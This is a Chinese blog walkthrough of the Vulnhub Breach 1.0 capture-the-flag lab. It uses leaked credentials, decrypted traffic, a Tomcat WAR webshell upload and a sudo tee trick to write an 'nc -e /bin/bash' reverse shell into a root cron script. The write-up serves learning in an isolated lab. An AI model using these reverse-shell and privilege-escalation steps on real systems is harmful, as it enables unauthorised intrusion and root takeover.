Vulnhub靶场渗透-Breach1.0

Vulnhub简介

Vulnhub是一个提供各种漏洞环境的一个靶场平台,大部分环境都是虚拟机镜像文件,预先设计各种漏洞
需要使用VMware或VirtualBox 运行,每个镜像都有破解的目标,从启动虚拟机到获取系统的 root 权限和查看 flag

https://www.vulnhub.com/

Breach1.0靶机信息

breach1.0 是一个难度初级到中级的Boot2Root/CTF挑战
静态ip(192.168.110.140),配置环境到同一个网段,我用的kali (192.168.110.128)来进行渗透

下面开始

信息收集

端口简单扫一下,好家伙基本上端口都是开放的,肯定是有问题的
在这里插入图片描述
访问192.168.110.140的 80 端口进入web页面
在这里插入图片描述
谷歌翻译了一下,哈哈哈
在这里插入图片描述

漏洞挖掘

1、右键查看首页源码,注意到注释很可疑,是一段base64 编码
在这里插入图片描述
两次解码得到一串账号密码
在这里插入图片描述
2、首页图片可以点击跳转,其他几个页面都是图片啥的,最后一个是 impresscms登录页
在这里插入图片描述
在这里插入图片描述
既然是登录页,那就用之前得到的账号密码尝试登录,登录成功,注意到有三封邮件
在这里插入图片描述
邮件三发现保存一个SSL证书,访问下载一个SSL证书的密钥库keystore,keystore是储存公私钥的一种文件格式
在这里插入图片描述
3、返回到左边的功能菜单,挨个查看了一下,profile 目录也看了一下,没发现什么漏洞
在这里插入图片描述
但找到一个很可疑的SSL,想到之前拿到的SSL密钥库,就点进去看了
在这里插入图片描述
在这里插入图片描述
谷歌翻译了一下
在这里插入图片描述
得到storepassword and keypassword are all set to 'tomcat'.,提到了无法读取文件很有可能就是流量包被前面的SSL加密了
访问下载流量包,wireshark打开应该是加密了流量
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
4、成功导出 .p12 证书,然后就是把他导入到wireshark,导入证书后HTTPS被解密,查看流量包
可以看到原来的一些TLS加密的变成了HTTP
最新版wireshark已经 把SSL 改为 TLS,其实SSL/TLS 都已统称通信加密协议
在这里插入图片描述
看样子像是被挂了图片马,执行了cmd
在这里插入图片描述
追踪http流,获得Tomcat后台登录地址http://192.168.110.140:8443/_M@nag3Me/html
采用http basic 认证,包含了用户名和密码的数据包 Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC
base64 解码得到tomcat:Tt\5D8F(#!*u=G)4m7zB

在这里插入图片描述
在这里插入图片描述
然后就是去访问Tomcat 后台登录
在这里插入图片描述
Tomcat后台的 getshell 有标准姿势,上养马场,准备好jsp版本的各种吗,像cmd小马,菜刀马,jspspy大马,打包成 .zip ,在改成 .war,上传部署
在这里插入图片描述
5、发现问题,用菜刀去连,一会儿就会断开,文件被删除,需要重新上传 war 包,猜测主机可能有杀软或者杀webshell的工具
解决方法,用bash反弹一个shell给我们
可以看我的另一篇文章
Linux反弹shell

查看当前系统用户 cat /etc/passwd ,注意到两个值的关注的用户,root就不用说了,我们关注的主要是有bin/bash权限的用户
在这里插入图片描述
进到网站根目录发现两个很长的文件名的php文件,打开看是数据库的连接文件,用户是 root 密码是空
在这里插入图片描述
登录mysql数据库,查询user表,拿到milton的密码MD5 thelaststraw在这里插入图片描述
在这里插入图片描述
提权到 milton用户
在这里插入图片描述
查看历史命令,看到su blumbergh,需要找到这个用户的密码
在这里插入图片描述
在根目录下有6张图片,用 exiftool 查看详细信息,在bill.png 下看到可疑的注释coffeestains
在这里插入图片描述
在这里插入图片描述
6、尝试登录blumbergh,提权成功,历史命令里发现有可疑文件
在这里插入图片描述
进入这个文件,这是个清理脚本,每三分钟执行清理删除webapps目录下的所有文件,所以之前的菜刀一直会断连就是被清理了
在这里插入图片描述
sudo -l查看sudo 权限,发现能够以 root权限执行 tee 和 tidyup.shtee 命令用于读取标准输入的数据,并将其内容输出成文件,tidyup.sh就是清理脚本
在这里插入图片描述
7、想法就是利用 tee 以 root的权限向清理脚本写入反弹 shell,拿到 root权限

nc反弹shell
echo "nc -e /bin/bash 192.168.110.128 4444" > shell.txt

使用 tee命令将shell.txt写到 清理脚本
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

查看是否写入
cat /usr/share/cleanup/tidyup.sh
在这里插入图片描述
成功写入,nc监听等待反弹shell,root权限
在这里插入图片描述
查看隐藏文件,打开 flag.txt ,通关
在这里插入图片描述

总结

也是第一次写这种渗透的练习靶场,遇到了很多的坑,比如说各种环境的奇怪报错,linux操作不熟等等很多问题

通过查阅文档资料一个一个问题复现解决也学到了很多,还会继续练习记录靶场学习

道路是曲折的,回首是牛逼的

哈哈哈

  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值